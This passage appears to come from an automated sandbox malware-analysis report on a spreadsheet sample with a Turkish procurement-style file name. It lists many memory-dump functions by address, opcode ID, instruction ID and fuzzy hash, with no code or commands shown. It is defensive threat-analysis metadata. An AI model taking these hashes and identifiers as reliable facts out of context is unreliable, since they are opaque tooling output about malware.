                                                  Function 05AD9E9B Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 270005f6900fa1dd8bc2dc86838325abef01f09905d023b24c55db74ccb661d9
                                                  • Instruction ID: 77e322a80f0c1494d72c1d883ad807f1273d892db58e3a813e6e4d2b13632b0b
                                                  • Opcode Fuzzy Hash: 270005f6900fa1dd8bc2dc86838325abef01f09905d023b24c55db74ccb661d9
                                                  • Instruction Fuzzy Hash: D121C6706102055FCB54EB69E445B6EBBFAFF84700F40883DE006D7654DFB59C069BA0
                                                  Function 03118030 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57b86254e500206095e86eae15954ff8ce2f94c68608823aa5f3557bf83294c1
                                                  • Instruction ID: d1af898488f764d5f7ad76adacc4be59abfb40b99e4e8d106f49a539c526d9bd
                                                  • Opcode Fuzzy Hash: 57b86254e500206095e86eae15954ff8ce2f94c68608823aa5f3557bf83294c1
                                                  • Instruction Fuzzy Hash: 02211270D0520DDFDB44EFAAE0887ADBAF5FB4D305F61C1AAD409A3258E7744A94CB10
                                                  Function 0149D006 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041534304.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_149d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6023f8c96a1f9ef83b3925e50821decce960c37d49e6b9608e8ea4fd75ff737
                                                  • Instruction ID: a35cb56f1871c127b1fc1cd9fc4d8ff864abce91656c778816c7cfebc54bccea
                                                  • Opcode Fuzzy Hash: d6023f8c96a1f9ef83b3925e50821decce960c37d49e6b9608e8ea4fd75ff737
                                                  • Instruction Fuzzy Hash: A021B0754093808FDB03CF24D994716BF71FB86214F28C1DBD8458B663C33A980ACB62
                                                  Function 031166B1 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2b7c154b9d1323ab23e924a8366363eeb0f0c26ff32be16109b02696c598153
                                                  • Instruction ID: 2d2c07e54950a3bba69842a1623097e4fd0414878ae1144590ce62115bf36977
                                                  • Opcode Fuzzy Hash: b2b7c154b9d1323ab23e924a8366363eeb0f0c26ff32be16109b02696c598153
                                                  • Instruction Fuzzy Hash: 06112BB5B802108FCB44EB78D958D5E3BEAAF9D25131105A5E50ACB375EE39DC008B60
                                                  Function 031164E1 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f78e1642bdf5e4f20d67f02f6a1a69f0768c6817585e00f28f1cc13f6e412644
                                                  • Instruction ID: ebfa49bd72752614792305f2cb3d203cbf87f5e3693efd396100360aa972cb0d
                                                  • Opcode Fuzzy Hash: f78e1642bdf5e4f20d67f02f6a1a69f0768c6817585e00f28f1cc13f6e412644
                                                  • Instruction Fuzzy Hash: 18111875B802108FCB45EB7CD958D5E3BEAAF9D26031205A9E50ACF375EE79DC0187A0
                                                  Function 05E00E38 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9d0f9a3d55245b977a39229bdeb24c1991879638e3aee31418d4e41f5698627
                                                  • Instruction ID: 06db2607be488a4e3681a5f8b732c9d508ceac764535ad7ba6916ff4356c668a
                                                  • Opcode Fuzzy Hash: a9d0f9a3d55245b977a39229bdeb24c1991879638e3aee31418d4e41f5698627
                                                  • Instruction Fuzzy Hash: DC2135B1D1420ADFCF00CFA9D8497EEBBB1FB49305F80A469D415B3290DB385686CB51
                                                  Function 0311223A Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecece73eaae9fcb2e185478936098e717e408cb379faf0d6f51d8c65f947968d
                                                  • Instruction ID: 41ab9c09131b377823d3b93c611b03c25a633be30ae3f3da0041d9a5a2307b99
                                                  • Opcode Fuzzy Hash: ecece73eaae9fcb2e185478936098e717e408cb379faf0d6f51d8c65f947968d
                                                  • Instruction Fuzzy Hash: FE11B2316093849FD706CB28E8506D9BFB5EF8F320F1840FBC048CB566D6399852C721
                                                  Function 05ADB2C0 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: babbfc67a2bddc19b63b27a861a193eefc5c20dc541ebf58d6c0eaf3efd13d8d
                                                  • Instruction ID: a4a96e5c67bf6528200b92441464da6c77ddd3c03544f5f834a46e6d79da7312
                                                  • Opcode Fuzzy Hash: babbfc67a2bddc19b63b27a861a193eefc5c20dc541ebf58d6c0eaf3efd13d8d
                                                  • Instruction Fuzzy Hash: 2111B631B142099FCF14EF699819BBEBBF6EB88610F054025E916DB280DE7089019FB0
                                                  Function 05E00E48 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 085b70b255c8f991ea429b50b3e1e0fd5451526bc56040fbd3722d8066d6f83d
                                                  • Instruction ID: 7c7159aedd0764e7a025a03dc43920b6d85cc8912a9833bfed75a9a0836a1e52
                                                  • Opcode Fuzzy Hash: 085b70b255c8f991ea429b50b3e1e0fd5451526bc56040fbd3722d8066d6f83d
                                                  • Instruction Fuzzy Hash: AF21F470D04209DBCF00CFA9D8487EEBBB6FB49301F90A469D459B3295DB745A868B51
                                                  Function 05AE20A0 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6f0ae756729b240bf4c87267177dae90d56ed7a8454aad16382176b46310f5e
                                                  • Instruction ID: 42ced1a19960fe851659d3298ad1ef15c75cc524dc439deab52b47be047ce93a
                                                  • Opcode Fuzzy Hash: b6f0ae756729b240bf4c87267177dae90d56ed7a8454aad16382176b46310f5e
                                                  • Instruction Fuzzy Hash: B711277A908154AFDB068F95DC44E887FBAAF1A321F0680D6E6089B232D232D955EB50
                                                  Function 05AD7551 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 210ca8497262a504fbe56e308f6092dbb20af07d53e889b51730120db99ac1be
                                                  • Instruction ID: 58af3ab2129632ec934da36e7b379dfc0d902d15afa3fa358fcb4d16e5498520
                                                  • Opcode Fuzzy Hash: 210ca8497262a504fbe56e308f6092dbb20af07d53e889b51730120db99ac1be
                                                  • Instruction Fuzzy Hash: 6A215C74906208CFDB14EF69D498B9CBBF2FB45304F4041AAE50AA7395DB345E85CF61
                                                  Function 0311DF50 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a8d5b9832acd252b0282fba5c07bda392ef96279b12b620a411537ee7e1aa39
                                                  • Instruction ID: 22541fe62d4fb92a05404347b1d7a8eba153b9114ff17e20cddbba713a48c32e
                                                  • Opcode Fuzzy Hash: 5a8d5b9832acd252b0282fba5c07bda392ef96279b12b620a411537ee7e1aa39
                                                  • Instruction Fuzzy Hash: FF11F670D0421ACFCB08CF99E455AFEBBB6FB8C311F10803AD515B2254D7755A96CBA1
                                                  Function 05AE6EAF Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d30d9ffdd5bd636ec615db0d8049e90642c849bd40d06285d3ecaaee8e842c19
                                                  • Instruction ID: 526258bf82c5320b8c8f79efc6907fa4f4538a8d00929256020a475c464c81f9
                                                  • Opcode Fuzzy Hash: d30d9ffdd5bd636ec615db0d8049e90642c849bd40d06285d3ecaaee8e842c19
                                                  • Instruction Fuzzy Hash: 1B01DB716097405FCB61CBA4E99099ABFB0EB23314B154D9FC06AC7193D622E817C751
                                                  Function 05AD7158 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e5e217778da2c9bb1b36c064336dfa04924c2fc6c1c0d512b5fdc6f84181336
                                                  • Instruction ID: 4e39e75702500bc7de210d926bec02408ee381291b1d280bf66379e996de1850
                                                  • Opcode Fuzzy Hash: 8e5e217778da2c9bb1b36c064336dfa04924c2fc6c1c0d512b5fdc6f84181336
                                                  • Instruction Fuzzy Hash: EC217274905108CFDB18DF6AD844BDEBBF6FB8A301F408169E40A67355DB345985CF60
                                                  Function 0148D5EF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 1973772f50b874fb3e1c634719628d7e315e0cd91b0e9b051202ccad083d53c1
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 8E11E172804284CFCB02DF44D5C4B1ABF71FB88324F24C5AAD9490B267C33AD45ACBA2
                                                  Function 0148D503 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: f1b1e54e5916d420ba8cfaa63abdadd3fe80f2c1d7798210b33db56cbdb4d5fa
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 0211E172904240CFCB02DF44D5C4B1ABF72FB84314F24C5AAD9094B2A7C336D45ACBA2
                                                  Function 05ADB041 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2868c5d2e7c7051ed86fb3e5ef7c80fe6b5df0836fe1def09052d8a660241028
                                                  • Instruction ID: 39ab927d178b6ae7809265bfdb4a1e5c0ec7f118ea7500afc13ca2664dc39984
                                                  • Opcode Fuzzy Hash: 2868c5d2e7c7051ed86fb3e5ef7c80fe6b5df0836fe1def09052d8a660241028
                                                  • Instruction Fuzzy Hash: DA218078A42219EFCB04DF68D594EADBBF2BF49700F154055E502AB360CB31AD41CF60
                                                  Function 05AD7210 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 618895a3803ad603b8507e13c50df9d273f32a56cd4328c4a643627223d650e0
                                                  • Instruction ID: ef870783e9e9168ebc6a2838869d7bdf02a5c53cb7e3a635c46fc39f8edc4a64
                                                  • Opcode Fuzzy Hash: 618895a3803ad603b8507e13c50df9d273f32a56cd4328c4a643627223d650e0
                                                  • Instruction Fuzzy Hash: 0021EC74902109CFEB18EF69E485B9DBBB2FB99314F5041AAE10AA7354DB345D82CF20
                                                  Function 05AD778F Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6196416f66c693f3ab0fa1069184aca89e2d41aa50e3db929cdadea1127f0990
                                                  • Instruction ID: 1bba2763c1cf3602fdf8fc82f9d61b61abc1395650efe90df1daf4d75eae12d1
                                                  • Opcode Fuzzy Hash: 6196416f66c693f3ab0fa1069184aca89e2d41aa50e3db929cdadea1127f0990
                                                  • Instruction Fuzzy Hash: 59211A74905119DFDB14EF69E488B9DBBB2FB45304F1041A9E00AA3355DB345EC5CF60
                                                  Function 05E05351 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ee076f607c9fdc35d48e186113d4225a82afea1e0cbcde03ee6ef14cb6eb316
                                                  • Instruction ID: cb7b66efd69ce2445988a4163338ce26d943d0237eef3c1d20bea0d49b1d491d
                                                  • Opcode Fuzzy Hash: 1ee076f607c9fdc35d48e186113d4225a82afea1e0cbcde03ee6ef14cb6eb316
                                                  • Instruction Fuzzy Hash: EC112E35905208EFCB05DF94D841AACFBB5FB48310F14D1AAEC4467395D7769A61DF80
                                                  Function 031154F0 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3932cf8c529eeb81b726ab713b0b08ce854d7cc97a48a6a94e1eafda79381482
                                                  • Instruction ID: 628d47a15cd87411e61ebb8b26d42339facddc6d3ea81b06929bd31acc581508
                                                  • Opcode Fuzzy Hash: 3932cf8c529eeb81b726ab713b0b08ce854d7cc97a48a6a94e1eafda79381482
                                                  • Instruction Fuzzy Hash: 0021D370A04218CFD718CF95D484BEDB7B2FB8D315F9581B5D01AAB668D338A894DB10
                                                  Function 05ADBF70 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 147c69507740f43b57208a68390383c5f23cec6fdfff5ed157cfeba550ba40b8
                                                  • Instruction ID: a9496f8c21744cdb3bb9b685585f32bfa159f071228c11c239fc9dd07bd9dc2c
                                                  • Opcode Fuzzy Hash: 147c69507740f43b57208a68390383c5f23cec6fdfff5ed157cfeba550ba40b8
                                                  • Instruction Fuzzy Hash: AE0192366082586FD754DBACD040EEEFBF4FB59260F1584ABE485C7290D631E990CB70
                                                  Function 05AD7B30 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4958b2a36febf7ee227e8485fd5c85207405e801cab370c39b480e9e2813eb4
                                                  • Instruction ID: 5bdb1ea4956b04588b07b9477c96320bc87770fada8e9b84003746e82899f793
                                                  • Opcode Fuzzy Hash: b4958b2a36febf7ee227e8485fd5c85207405e801cab370c39b480e9e2813eb4
                                                  • Instruction Fuzzy Hash: EE213A78902108CFDB18EF65E488BDDBBF2FB46304F5042AAE10AA7355CB345E858F20
                                                  Function 05AD7ABE Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf79206435e091fc565d97ad7f507ce3d2581d61f787015942cf7bbb22b668d0
                                                  • Instruction ID: 0c3fd4c6d066a31397d1f19dcf5d318f8e784b93d797f1830d91c354e83ae899
                                                  • Opcode Fuzzy Hash: cf79206435e091fc565d97ad7f507ce3d2581d61f787015942cf7bbb22b668d0
                                                  • Instruction Fuzzy Hash: 7F212C74901219CFDB18EF69E484B9DBBB2FB45315F5041AAE00AA7355DB345DC6CF20
                                                  Function 05ADAF20 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c894357af87b4f5587fcfd2525fff6bbca19c8a4c55d86986df2531a72a0cb35
                                                  • Instruction ID: 21dd241c14818d1ecf76bd82837eddc0219aaf33912c59e06ef44799dd35fdb0
                                                  • Opcode Fuzzy Hash: c894357af87b4f5587fcfd2525fff6bbca19c8a4c55d86986df2531a72a0cb35
                                                  • Instruction Fuzzy Hash: 25016C76340215AFD7109F59DC85F9BBBA9FB89721F10C066FA15CF290CA71D8119760
                                                  Function 05E047A9 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 133371dfddb9187c5dcc02605060d4037b77ac99c3ea0137d95e9fd898ed8b17
                                                  • Instruction ID: 708e2e6b1c2d2fa922f8d23900c37f20d8e7f5d408b09b0f1c327422c55010a0
                                                  • Opcode Fuzzy Hash: 133371dfddb9187c5dcc02605060d4037b77ac99c3ea0137d95e9fd898ed8b17
                                                  • Instruction Fuzzy Hash: 4D01D272805208EFCF01EFA4C941BEDBBB5EB49300F50C1A9E945572A0DB729A51DF91
                                                  Function 03116618 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 105f989d89fc0f589c812ebb1bfbe28c7cea1890cc25acdbe65c21a5073258c1
                                                  • Instruction ID: 073b3111fcad5c7c2e52446c6cc106bdef113f59c7998518ddf89da11747397d
                                                  • Opcode Fuzzy Hash: 105f989d89fc0f589c812ebb1bfbe28c7cea1890cc25acdbe65c21a5073258c1
                                                  • Instruction Fuzzy Hash: E4015E76B901108FCB54EF7CD8189AD3BE6AFED21031245A5E409CB375DE78DC0187A0
                                                  Function 03116401 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c5914f0c5cca2352c198eaa0ac65f22d96652453ad9a6f1bf8dbb1403bee89d
                                                  • Instruction ID: d52f514bc036250e8eed41e90ba1e08a5a29875a731cd2b112d39dce39a16d73
                                                  • Opcode Fuzzy Hash: 5c5914f0c5cca2352c198eaa0ac65f22d96652453ad9a6f1bf8dbb1403bee89d
                                                  • Instruction Fuzzy Hash: D1018075B803008FCB48EF7CD9189593BEAAF9D66131205A9E00ACB375DE79DC01CB90
                                                  Function 057EED2F Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0e3e49bfca1ff6dcdc6be79e08ab0b6dc00c1041a3c3016aafeb7857d11aeab
                                                  • Instruction ID: aed8673acd9baeae1a922ef6c40402c732988d6f9ff7690bf11b3566f6798890
                                                  • Opcode Fuzzy Hash: c0e3e49bfca1ff6dcdc6be79e08ab0b6dc00c1041a3c3016aafeb7857d11aeab
                                                  • Instruction Fuzzy Hash: FDF0466170E7E14FC71A562C2C946547F68EB4B69074608ABDC44CB376D1518C0AA372
                                                  Function 05AEA441 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5eafa32c3c258790a3775550cb355ed412f06211ce52c8e70b1862b1bf62d1bb
                                                  • Instruction ID: aabb7f5bda865e673781a0eefbce41c8f6b4be6a1b3862b30efb3908f3583250
                                                  • Opcode Fuzzy Hash: 5eafa32c3c258790a3775550cb355ed412f06211ce52c8e70b1862b1bf62d1bb
